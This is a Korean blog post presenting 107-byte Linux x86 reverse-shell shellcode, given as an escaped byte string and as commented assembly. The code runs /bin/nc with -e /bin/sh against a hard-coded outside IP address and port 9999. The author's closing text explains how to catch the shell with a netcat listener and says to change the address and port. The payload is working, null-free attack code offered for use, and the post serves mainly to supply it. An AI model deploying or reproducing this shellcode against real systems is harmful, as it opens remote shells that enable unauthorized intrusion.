Linux-x86 /bin/nc reverseshell 쉘코드 (107바이트)

2010/03/21 21:44

/*
/x31/xc0/x50/x68/x39/x39/x39/x39/x68/x31/x31/x39/x01/x88/x44/x24/x03/x68/x31/x33/x36/x2e/x68/x31/x31/x30/x2e/x68/x32/x31/x30/x2e/x68/x2f/x73/x68/x01/x88/x44/x24/x03/x68/x2f/x62/x69/x6e/x68/x2d/x76/x65/x01/x88/x44/x24/x03/x68/x2f/x6e/x63/x01/x88/x44/x24/x03/x68/x2f/x62/x69/x6e/x50/x8d/x5c/x24/x28/x53/x8d/x5c/x24/x1c/x53/x8d/x5c/x24/x18/x53/x8d/x5c/x24/x18/x53/x8d/x5c/x24/x14/x53/x8b/x1c/x24/x8d/x0c/x24/x31/xd2/xb0/x0b/xcd/x80
*/

# Builds the strings and the argv array for one execve call on the stack, then
# issues the syscall through int $0x80 (32-bit x86 Linux, AT&T/GAS syntax).
# Resulting call:
#   execve("/bin/nc", {"/bin/nc", "-ve", "/bin/sh", "210.110.136.119", "9999", NULL}, NULL)
# so nc is started with a hard-coded address and port and told to run /bin/sh.
#
# Registers at the syscall: eax = 0xb (execve), ebx = path, ecx = argv,
# edx = NULL envp.
#
# Strings are pushed last-dword-first because the stack grows downwards and
# each 32-bit immediate is stored little-endian, so the bytes read forwards in
# memory. Where a string needs a terminator inside a dword, the immediate
# carries 0x01 in its top byte and the following movb overwrites it with the
# zero held in %al - presumably to keep zero bytes out of the encoded
# instructions (the byte dump above contains none).
#
# Observable behaviour for defenders: process-execution logging records
# /bin/nc being exec'd with the arguments -ve /bin/sh <address> <port>, and nc
# then opens an outbound TCP connection to that address.
# NOTE(review): this depends on the installed nc accepting -e; some netcat
# builds are compiled without that option.
# NOTE(review): nothing follows int $0x80, so if execve fails execution runs
# on into whatever bytes come next; there is no exit path.
.globl main

main:
xor %eax, %eax # eax = 0: source of every NUL byte and NULL pointer below

push %eax # four zero bytes: terminator for the port string
push $0x39393939 # 9999
push $0x01393131 # "119" + 0x01 placeholder
movb %al, 0x3(%esp) # placeholder -> NUL, ends the address string
push $0x2e363331 # "136."
push $0x2e303131 # "110."
push $0x2e303132 # 210.110.136.119
push $0x0168732f # "/sh" + 0x01 placeholder
movb %al, 0x3(%esp) # placeholder -> NUL
push $0x6e69622f # /bin/sh
push $0x0165762d # -ve
movb %al, 0x3(%esp) # placeholder -> NUL
push $0x01636e2f # "/nc" + 0x01 placeholder
movb %al, 0x3(%esp) # placeholder -> NUL
push $0x6e69622f # /bin/nc

# argv is built from its last element to its first. Every push moves %esp
# down by 4, which is why the offsets to the strings change from one lea to
# the next (and why two different strings are both reached via 0x18).
push %eax # argv[5] = NULL
lea 0x28(%esp), %ebx # ebx = address of "9999"
push %ebx # argv[4]
lea 0x1c(%esp), %ebx # ebx = address of "210.110.136.119"
push %ebx # argv[3]
lea 0x18(%esp), %ebx # ebx = address of "/bin/sh"
push %ebx # argv[2]
lea 0x18(%esp), %ebx # ebx = address of "-ve"
push %ebx # argv[1]
lea 0x14(%esp), %ebx # ebx = address of "/bin/nc"
push %ebx # argv[0]

mov (%esp), %ebx # ebx = argv[0], the path "/bin/nc"
lea (%esp), %ecx # ecx = argv (pointer array starting at %esp)
xor %edx, %edx # edx = NULL, no environment
mov $0xb, %al # eax = 0xb; the upper bytes are still zero from the xor at the top
int $0x80 # execve("/bin/nc", argv, NULL), argv = {"/bin/nc", "-ve", "/bin/sh", [ip], [port], NULL}


이것도 예전에 만들어두었던 리버스쉘을 띄우는 쉘코드입니다.

nc -l -p 9999


위와 같이 nc로 대기한 채 쉘코드를 실행시키면 리버스쉘이 뜨지요. ip와 port는 적당히 수정하면 됩니다. 뭐, 107 바이트나 되는 무지막지한 녀석이라서 쓸 데가 있으려나 모르겠지만...
크리에이티브 커먼즈 라이센스
Creative Commons License

6l4ck3y3 0x03 Linux RCE , , , , , ,
